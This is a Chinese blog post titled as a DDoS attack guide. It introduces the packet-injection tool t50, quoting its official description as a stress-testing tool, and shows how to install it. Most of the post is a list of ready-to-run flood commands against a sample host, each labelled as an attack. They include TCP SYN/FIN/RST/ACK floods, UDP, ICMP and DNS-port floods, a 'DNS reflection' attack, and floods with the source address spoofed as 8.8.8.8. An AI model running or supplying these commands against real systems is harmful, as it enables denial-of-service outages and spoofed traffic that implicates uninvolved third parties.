首页 > 其他分享 >DDOS攻击指北

DDOS攻击指北

时间:2023-01-13 18:33:10浏览次数:57  
标签:指北 protocol flood 攻击 8.8 TCP -- DDOS t50

DDoS压力测试工具 t50

官方介绍

T50(fka F22 Raptor)是一种旨在执行“压力测试”的工具。这个概念始于 2001 年,就​​在发布“nb-isakmp.c”之后,主要目标是:有一个工具来执行 TCP/IP 协议模糊器,涵盖常见的常规协议,例如:ICMP、TCP 和 UDP。

事情发生了变化,T50 成为能够执行“压力测试”的良好独特资源。并且,在检查“/usr/include/linux”之后,一些协议被选为其覆盖范围的一部分:

  • ICMP - 互联网控制消息协议
  • IGMP - 互联网组管理协议
  • TCP - 传输控制协议
  • UDP - 用户数据报协议

为什么要“压力测试”?好吧,因为当人们设计新的网络基础设施(例如服务于云计算的数据中心)时,他们会考虑:

  • 高可用性
  • 负载均衡
  • 备份站点(冷站点、热站点和暖站点)
  • 灾难恢复
  • 数据冗余
  • 服务等级协定
  • ETC...

但几乎没有人考虑“压力测试”,甚至没有人执行任何测试来检查网络基础设施在压力、过载和攻击下的行为。即使在渗透测试期间,人们也不喜欢运行任何类型的拒绝服务测试。更糟糕的是,这些人忽略了风险管理中常见的三个关键安全概念之一:

  • 保密
  • 完整性
  • 可用性

T50 旨在使用广泛实施的协议在各种基础设施网络设备(版本 2.45)上执行“压力测试”,并且在一些请求之后被重新设计以扩展测试(从版本 5.3 开始),涵盖一些常规协议(ICMP、TCP 和 UDP)、一些基础结构特定协议(GRE、IPSec 和 RSVP)和一些路由协议(RIP、EIGRP 和 OSPF)。
T50 是一款功能强大且独特的数据包注入器工具,它能够:

1.按顺序发送以下十五 (15) 个协议:

  • ICMP - 互联网控制消息协议
  • IGMPv1 - Internet 组管理协议 v1
  • IGMPv3 - Internet 组管理协议 v3
  • TCP - 传输控制协议
  • EGP - 外部网关协议
  • UDP - 用户数据报协议
  • RIPv1 - 路由信息协议 v1
  • RIPv2 - 路由信息协议 v2
  • DCCP - 数据报拥塞控制协议
  • RSVP - 资源预留协议
  • GRE - 通用路由封装
  • IPSec - 互联网协议安全 (AH/ESP)
  • EIGRP - 增强型内部网关路由协议
  • OSPF - 开放最短路径优先

2.它是唯一能够在通用路由封装 (GRE) 中封装协议(上面列出的)的工具。

3.每秒发送(相当)数量惊人的数据包,使其成为“首屈一指”的工具:

  • 1000BASE-T 网络(千兆以太网)中超过 1,000,000 pps 的 SYN 泛洪(+50% 的网络上行链路)。
  • 100BASE-TX 网络(快速以太网)中超过 120,000 pps 的 SYN Flood(+60% 的网络上行链路)。
  • 对各种网络基础设施、网络设备和安全解决方案进行“压力测试”。
  • 模拟“分布式拒绝服务”和“拒绝服务”攻击,验证防火墙规则、路由器 ACL、入侵检测系统和入侵防御系统策略。

下载&安装方式

原本官方的地址已经在Github永久删除了。

现在有两个地址可以下载。

还有更方便的安装方式。

$ apt install -y t50

使用方法

常用参数如下。

--threshold:并发线程数,默认1000
--flood:最大功率攻击,与threshold冲突
--protocol:设置攻击模型
--protocol T50:这是一个模拟协议,使用所有支持的协议进行dos
--turbo:使用子线程是的攻击流程更快,但是会占用更多本地资源
--sport/--dport:自定义原始端口以及目标端口,默认随机生成
-s/--saddr:模拟发送方的ip,默认随机生成

针对tcp发动洪水工具,随机发送方

$ t50 --flood --protocol TCP 192.168.1.1

模拟成8.8.8.8 发送tcp攻击

$ t50 --flood --protocol TCP --saddr 8.8.8.8 192.168.1.1

攻击ICMP链路

$ t50 --flood --protocol ICMP 192.168.1.1

发送udp攻击

$ t50 --flood --protocol UDP 192.168.1.1

攻击dns服务器

$ t50 --flood --protocol UDP --dport 53 192.168.1.1

使用sync配合tcp攻击

$ t50 --flood --protocol TCP --syn --saddr 8.8.8.8 192.168.1.1

随机源IP,随机TCP flag攻击

$ t50 --flood --protocol TCP 192.168.1.1

固定源IP,随机TCP flag攻击

$ t50 --flood --protocol TCP --saddr 8.8.8.8 192.168.1.1

固定源IP,固定TCP flag攻击

$ t50 --flood --protocol TCP --fin --saddr 8.8.8.8 192.168.1.1
$ t50 --flood --protocol TCP --syn --saddr 8.8.8.8 192.168.1.1
$ t50 --flood --protocol TCP --rst --saddr 8.8.8.8 192.168.1.1
$ t50 --flood --protocol TCP --psh --saddr 8.8.8.8 192.168.1.1
$ t50 --flood --protocol TCP --ack --saddr 8.8.8.8 192.168.1.1

随机源IP,UDP攻击

$ t50 --flood --protocol UDP 192.168.1.1

固定源IP,DNS攻击

$ t50 --flood --protocol UDP --dport 53 192.168.1.1

随机源IP,DNS反射攻击

$ t50 --flood --protocol UDP --sport 53 192.168.1.1

随机源IP,ICMP攻击

$ t50 --flood --protocol ICMP 192.168.1.1

固定源IP,ICMP攻击

$ t50 --flood --protocol ICMP --saddr 8.8.8.8 192.168.1.1

如果攻击被拦截或者协议出现问题会出现报错

t50: Cannot send packet (Permission!?).  Please check your firewall rules (iptables?).

标签:指北,protocol,flood,攻击,8.8,TCP,--,DDOS,t50
From: https://www.cnblogs.com/zhibing/p/17050490.html

相关文章

  • 企业及个人如何有效防护网络攻击
    企业及个人如何有效防护网络攻击众所周知,网络攻击手段有很多,让人眼花缭乱、防不胜防,其带来的危害和影响也非常之大,因此“如何防范网络攻击”成为大家关注的重点。本文为大......
  • web页面攻击分为几类?可以提供几种解决方案吗?
    WEB基本攻击大致可以分为三大类——“资源枚举”、“参数操纵”和“其它攻击”资源枚举:遍历站点所有可访问的目录,然后把一些常见的备胎文件名(比如“sql.bak”、“index-......
  • 黑客使用虚假 DDoS 保护页面分发恶意软件
    WordPress网站被黑客入侵后显示欺诈性CloudflareDDoS保护页面,这些页面被用于分发恶意软件(例如NetSupportRAT和RaccoonStealer)。“最近针对WordPress网站的Ja......
  • CobaltStrike钓鱼攻击
    木马  cs可以生成HTA木马、office宏木马以及exe木马      HTA木马  HTA是HTMLApplication的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件。HTA虽然......
  • arp攻击原理
    arp攻击原理是通过伪造arp应答,将真的ip与假的mac地址发送给主机。首先需要攻破一台内网的服务器作为攻击主机,在攻击主机发送arp应答1.攻击主机发送arp应答,包......
  • git使用指北
    1、设置用户查看用户配置信息gitconfig--list全局配置gitconfig--globaluser.name'aj'gitconfig--globaluser.email'[email protected]'给单独的项目设置......
  • Cobalt Strike 用户驱动攻击
    屏幕截图                         键盘记录   LogKeystrokes记录键盘输入         如果想停止键盘记录进程的话,使用进......
  • MSSQL攻击面探索
    xp_cmdshell开启id=1'EXECsp_configure'showadvancedoptions',1;RECONFIGURE;execSP_CONFIGURE'xp_cmdshell',1;RECONFIGURE;--+命令执行id=1'execm......
  • DenyHos黑白名单防ssh攻击
    DenyHos黑白名单防ssh攻击DenyHosts是Python语言写的一个程序,它会分析sshd的日志文件(/var/log/secure),当发现重复的攻击时就会记录IP到/etc/hosts.deny文件,从而达到自动......
  • Tomcat拒绝服务攻击(CVE-2020-13935)
    漏洞简介CVE-2020-13935ApacheTomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServerPage(JSP)的支持。ApacheTomcat中的WebSo......